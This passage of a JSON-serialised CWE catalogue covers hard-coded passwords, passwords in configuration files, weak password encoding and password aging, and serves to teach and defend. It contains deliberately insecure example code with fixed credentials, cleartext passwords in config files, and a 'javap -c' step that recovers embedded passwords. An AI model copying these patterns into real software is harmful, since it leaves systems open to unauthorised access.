Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Likelihood_of_Exploit, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}]}},"259":{"attr":{"@_ID":"259","@_Name":"Use of Hard-coded Password","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software contains a hard-coded password, which it uses for its own inbound authentication or for outbound communication to external components.","Extended_Description":{"xhtml:p":["A hard-coded password typically leads to a significant authentication failure that can be difficult for the system administrator to detect. Once detected, it can be difficult to fix, so the administrator may be forced into disabling the product entirely. There are two main variations:","In the Inbound variant, a default administration account is created, and a simple password is hard-coded into the product and associated with that account. This hard-coded password is the same for each installation of the product, and it usually cannot be changed or disabled by system administrators without manually modifying the program, or otherwise patching the software. If the password is ever discovered or published (a common occurrence on the Internet), then anybody with knowledge of this password can access the product. Finally, since all installations of the software will have the same password, even across different organizations, this enables massive attacks such as worms to take place.","The Outbound variant applies to front-end systems that authenticate with a back-end service. The back-end service may require a fixed password which can be easily discovered. The programmer may simply hard-code those back-end credentials into the front-end software. Any user of that program may be able to extract the password. Client-side systems with hard-coded passwords pose even more of a threat, since the extraction of a password from a binary is usually very simple."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Inbound: the software contains an authentication mechanism that checks for a hard-coded password.","Outbound: the software connects to another system or component, and it contains hard-coded password for connecting to that component."]}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"798","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"798","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"798","@_View_ID":"1340","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"321","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"257","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Architecture and Design"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"If hard-coded passwords are used, it is almost certain that malicious users will gain access through the account in question."}},"Detection_Methods":{"Detection_Method":[{"Method":"Manual Analysis","Description":"This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.","Effectiveness_Notes":"These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."},{"attr":{"@_Detection_Method_ID":"DM-11.6"},"Method":"Black Box","Description":{"xhtml:p":["Use monitoring tools that examine the software\'s process as it interacts with the operating system and the network. This technique is useful in cases when source code is unavailable, if the software was not developed by you, or if you want to verify that the build phase did not introduce any new weaknesses. Examples include debuggers that directly attach to the running process; system-call tracing utilities such as truss (Solaris) and strace (Linux); system activity monitors such as FileMon, RegMon, Process Monitor, and other Sysinternals utilities (Windows); and sniffers and protocol analyzers that monitor network traffic.","Attach the monitor to the process and perform a login. Using disassembled code, look at the associated instructions and see if any of them appear to be comparing the input to a fixed string or value."]}}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"For outbound authentication: store passwords outside of the code in a strongly-protected, encrypted configuration file or database that is protected from access by all outsiders, including other local users on the same system. Properly protect the key (CWE-320). If you cannot use encryption to protect the file, then make sure that the permissions are as restrictive as possible."},{"Phase":"Architecture and Design","Description":"For inbound authentication: Rather than hard-code a default username and password for first time logins, utilize a \\"first login\\" mode that requires the user to enter a unique strong password."},{"Phase":"Architecture and Design","Description":"Perform access control checks and limit which entities can access the feature that requires the hard-coded password. For example, a feature might only be enabled through the system console instead of through a network connection."},{"Phase":"Architecture and Design","Description":{"xhtml:p":["For inbound authentication: apply strong one-way hashes to your passwords and store those hashes in a configuration file or database with appropriate access control. That way, theft of the file/database still requires the attacker to try to crack the password. When receiving an incoming password during authentication, take the hash of the password and compare it to the hash that you have saved.","Use randomly assigned salts for each separate hash that you generate. This increases the amount of computation that an attacker needs to conduct a brute-force attack, possibly limiting the effectiveness of the rainbow table method."]}},{"Phase":"Architecture and Design","Description":{"xhtml:p":"For front-end to back-end connections: Three solutions are possible, although none are complete.","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["The first suggestion involves the use of generated passwords which are changed automatically and must be entered at given time intervals by a system administrator. These passwords will be held in memory and only be valid for the time intervals.","Next, the passwords used should be limited at the back end to only performing actions valid for the front end, as opposed to having full access.","Finally, the messages sent should be tagged and checksummed with time sensitive values so as to prevent replay style attacks."]}}}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-13"},"Intro_Text":"The following code uses a hard-coded password to connect to a database:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...DriverManager.getConnection(url, \\"scott\\", \\"tiger\\");...","xhtml:br":["",""]}},{"attr":{"@_Nature":"attack"},"xhtml:div":{"#text":"javap -c ConnMngr.class","xhtml:div":{"#text":"22: ldc #36; //String jdbc:mysql://ixne.com/rxsql24: ldc #38; //String scott26: ldc #17; //String tiger","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}}],"Body_Text":"This is an example of an external hard-coded password on the client-side of a connection. This code will run successfully, but anyone who has access to it will have access to the password. Once the program has shipped, there is no going back from the database user \\"scott\\" with a password of \\"tiger\\" unless the program is patched. A devious employee with access to this information can use it to break into the system. Even worse, if attackers have access to the bytecode for application, they can use the javap -c command to access the disassembled code, which will contain the values of the passwords used. The result of this operation might look something like the following for the example above:"},{"attr":{"@_Demonstrative_Example_ID":"DX-14"},"Intro_Text":"The following code is an example of an internal hard-coded password in the back-end:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int VerifyAdmin(char *password) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (strcmp(password, \\"Mew!\\")) {}printf(\\"Entering Diagnostic Mode...\\\\n\\");return(1);","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"printf(\\"Incorrect Password!\\\\n\\");return(0)","xhtml:br":""}},"xhtml:br":["",""]}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"int VerifyAdmin(String password) {}","xhtml:div":{"#text":"if (!password.equals(\\"Mew!\\")) {}//Diagnostic Modereturn(1);","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"return(0)","attr":{"@_style":"margin-left:10px;"}},"xhtml:br":["",""]}}}],"Body_Text":"Every instance of this program can be placed into diagnostic mode with the same password. Even worse is the fact that if this program is distributed as a binary-only distribution, it is very difficult to change that password or disable this \\"functionality.\\""},{"attr":{"@_Demonstrative_Example_ID":"DX-43"},"Intro_Text":"The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but they are stored in cleartext.","Body_Text":["This Java example shows a properties file with a cleartext username / password pair.","The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database but the pair is stored in cleartext.","Username and password information should not be included in a configuration file or a properties file in cleartext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...webapp.ldap.username=secretUsernamewebapp.ldap.password=secretPassword...","xhtml:br":["","","","",""],"xhtml:i":"# Java Web App ResourceBundle properties file"}},{"attr":{"@_Nature":"bad","@_Language":"ASP.NET"},"xhtml:div":{"#text":"...&lt;connectionStrings&gt;&lt;/connectionStrings&gt;...","xhtml:br":["",""],"xhtml:div":{"#text":"&lt;add name=\\"ud_DEV\\" connectionString=\\"connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;\\" providerName=\\"System.Data.Odbc\\" /&gt;","attr":{"@_style":"margin-left:10px;"}}}}]}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Password Management: Hard-Coded Password"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Use of hard-coded password"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A3","Entry_Name":"Broken Authentication and Session Management","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MSC03-J","Entry_Name":"Never hard code sensitive information"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP33","Entry_Name":"Hardcoded sensitive data"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 19: Use of Weak Password-Based Systems.&#34; Page 279"}}]},"Notes":{"Note":{"#text":"This entry could be split into multiple variants: an inbound variant (as seen in the second demonstrative example) and an outbound variant (as seen in the first demonstrative example). These variants are likely to have different consequences, detectability, etc. More importantly, from a vulnerability theory perspective, they could be characterized as different behaviors.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-13","Modification_Comment":"Significant description modifications to emphasize different variants."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Demonstrative_Examples, Description, Maintenance_Notes, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Demonstrative_Examples, Description, Maintenance_Notes, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"KDM Analytics","Modification_Date":"2009-07-17","Modification_Comment":"Improved the White_Box_Definition"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples, Description, Detection_Factors, Name, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Detection_Factors, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Potential_Mitigations, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Demonstrative_Examples, Likelihood_of_Exploit, Modes_of_Introduction, Relationships, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Maintenance_Notes"}],"Previous_Entry_Name":{"#text":"Hard-Coded Password","attr":{"@_Date":"2010-02-16"}}}},"260":{"attr":{"@_ID":"260","@_Name":"Password in Configuration File","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software stores a password in a configuration file that might be accessible to actors who do not know the password.","Extended_Description":"This can result in compromise of the system for which the password is used. An attacker could gain access to this file and learn the stored password or worse yet, change the password to one of their choosing.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"522","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Avoid storing passwords in easily accessible locations."},{"Phase":"Architecture and Design","Description":"Consider storing cryptographic hashes of passwords as an alternative to storing in plaintext."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"Below is a snippet from a Java properties file.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"webapp.ldap.username = secretUsernamewebapp.ldap.password = secretPassword","xhtml:br":""}},"Body_Text":"Because the LDAP credentials are stored in plaintext, anyone with access to the file can gain access to the resource."},{"attr":{"@_Demonstrative_Example_ID":"DX-43"},"Intro_Text":"The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but they are stored in cleartext.","Body_Text":["This Java example shows a properties file with a cleartext username / password pair.","The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database but the pair is stored in cleartext.","Username and password information should not be included in a configuration file or a properties file in cleartext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...webapp.ldap.username=secretUsernamewebapp.ldap.password=secretPassword...","xhtml:br":["","","","",""],"xhtml:i":"# Java Web App ResourceBundle properties file"}},{"attr":{"@_Nature":"bad","@_Language":"ASP.NET"},"xhtml:div":{"#text":"...&lt;connectionStrings&gt;&lt;/connectionStrings&gt;...","xhtml:br":["",""],"xhtml:div":{"#text":"&lt;add name=\\"ud_DEV\\" connectionString=\\"connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;\\" providerName=\\"System.Data.Odbc\\" /&gt;","attr":{"@_style":"margin-left:10px;"}}}}]}]},"Affected_Resources":{"Affected_Resource":"File or Directory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Password Management: Password in Configuration File"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-207"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Affected_Resources, Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"261":{"attr":{"@_ID":"261","@_Name":"Weak Encoding for Password","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Obscuring a password with a trivial encoding does not protect the password.","Extended_Description":"Password management issues occur when a password is stored in plaintext in an application\'s properties or configuration file. A programmer can attempt to remedy the password management problem by obscuring the password with an encoding function, such as base 64 encoding, but this effort does not adequately protect the password.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"326","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity"}},"Potential_Mitigations":{"Mitigation":{"Description":"Passwords should be encrypted with keys that are at least 128 bits in length for adequate security."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code reads a password from a properties file and uses the password to connect to a database.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...Properties prop = new Properties();prop.load(new FileInputStream(\\"config.properties\\"));String password = Base64.decode(prop.getProperty(\\"password\\"));DriverManager.getConnection(url, usr, password);...","xhtml:br":["","","","",""]}},"Body_Text":"This code will run successfully, but anyone with access to config.properties can read the value of password and easily determine that the value has been base 64 encoded. If a devious employee has access to this information, they can use it to break into the system."},{"Intro_Text":"The following code reads a password from the registry and uses the password to create a new network credential.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"...string value = regKey.GetValue(passKey).ToString();byte[] decVal = Convert.FromBase64String(value);NetworkCredential netCred = newNetworkCredential(username,decVal.toString(),domain);...","xhtml:br":["","","",""]}},"Body_Text":"This code will run successfully, but anyone who has access to the registry key used to store the password can read the value of password. If a devious employee has access to this information, they can use it to break into the system."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Password Management: Weak Cryptography"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A8","Entry_Name":"Insecure Storage","Mapping_Fit":"CWE More Specific"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"55"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-207"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 19: Use of Weak Password-Based Systems.&#34; Page 279"}}]},"Notes":{"Note":{"attr":{"@_Type":"Other"},"xhtml:p":"The \\"crypt\\" family of functions uses weak cryptographic algorithms and should be avoided. It may be present in some projects for compatibility."}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Other_Notes, References, Relationships, Type"}],"Previous_Entry_Name":{"#text":"Weak Cryptography for Passwords","attr":{"@_Date":"2020-02-24"}}}},"262":{"attr":{"@_ID":"262","@_Name":"Not Using Password Aging","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"If no mechanism is in place for managing password aging, users will have no incentive to update passwords in a timely manner.","Extended_Description":"Security experts have often recommended that users change their passwords regularly and avoid reusing passwords. Although this can be an effective mitigation, if the expiration window is too short, it can cause users to generate poor or predictable passwords. As such, it is important to discourage creating similar passwords. It is also useful to have a password aging mechanism that notifies users when passwords are considered old and requests that they replace them with new, strong passwords. Companion documentation which stresses how important this practice is can help users understand and better support this approach.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"309","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"263","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"324","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"As passwords age, the probability that they are compromised grows."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"As part of a product\'s design, require users to change their passwords regularly and avoid reusing previous passwords."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"A system does not enforce the changing of passwords every certain period."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Not allowing password aging"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"16"}},{"attr":{"@_CAPEC_ID":"49"}},{"attr":{"@_CAPEC_ID":"509"}},{"attr":{"@_CAPEC_ID":"55"}},{"attr":{"@_CAPEC_ID":"555"}},{"attr":{"@_CAPEC_ID":"560"}},{"attr":{"@_CAPEC_ID":"561"}},{"attr":{"@_CAPEC_ID":"565"}},{"attr":{"@_CAPEC_ID":"600"}},{"attr":{"@_CAPEC_ID":"652"}},{"attr":{"@_CAPEC_ID":"653"}},{"attr":{"@_CAPEC_ID":"70"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 19: Use of Weak Password-Based Systems.&#34; Page 279"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Likelihood_of_Exploit, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Demonstrative_Examples, Description, Potential_Mitigations, References, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}],"Previous_Entry_Name":{"#text":"Not Allowing Password Aging","attr":{"@_Date":"2008-04-11"}}}},"263":{"attr":{"@_ID":"263","@_Name":"Password Aging with Long Expiration","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"Allowing password aging to occur unchecked can result in the possibility of diminished password integrity.","Extended_Description":"Just as neglecting to include functionality for the management of password aging is dangerous, so is allowing password aging to continue unchecked. Passwords must be given a maximum life span, after which a user is required to update with a new and different password.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"As passwords age, the probability that they are compromised grows."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Ensure that password aging is limited so that there is a defined maximum age for passwords and so that the user is notified several times leading up to the password 